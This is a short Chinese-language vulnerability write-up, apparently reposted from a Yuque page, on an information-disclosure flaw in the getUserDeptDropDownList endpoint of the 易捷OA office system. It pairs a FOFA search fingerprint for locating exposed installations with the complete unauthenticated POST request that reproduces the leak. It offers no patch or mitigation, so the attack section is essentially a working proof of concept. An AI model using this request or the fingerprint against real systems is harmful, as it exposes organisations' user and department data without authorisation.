登录 白背景
源码

易捷OA getUserDeptDropDownList存在信息泄露漏洞

一、漏洞简介

易捷OA getUserDeptDropDownList存在信息泄露漏洞

二、影响版本

  • 易捷OA

三、资产测绘

  • fofabody="/images/logon/yij.png"
  • 特征

1722771339391-4d483424-95d2-435f-ac9e-e7b1f4cba63e.png

四、漏洞复现

POST /autohint.t?op=getUserDeptDropDownList HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0

1722782096541-9e77692c-4291-475e-a1bf-739c2a9b9941.png

原文: https://www.yuque.com/xiaokp7/ocvun2/fggx34vmbn87xw0n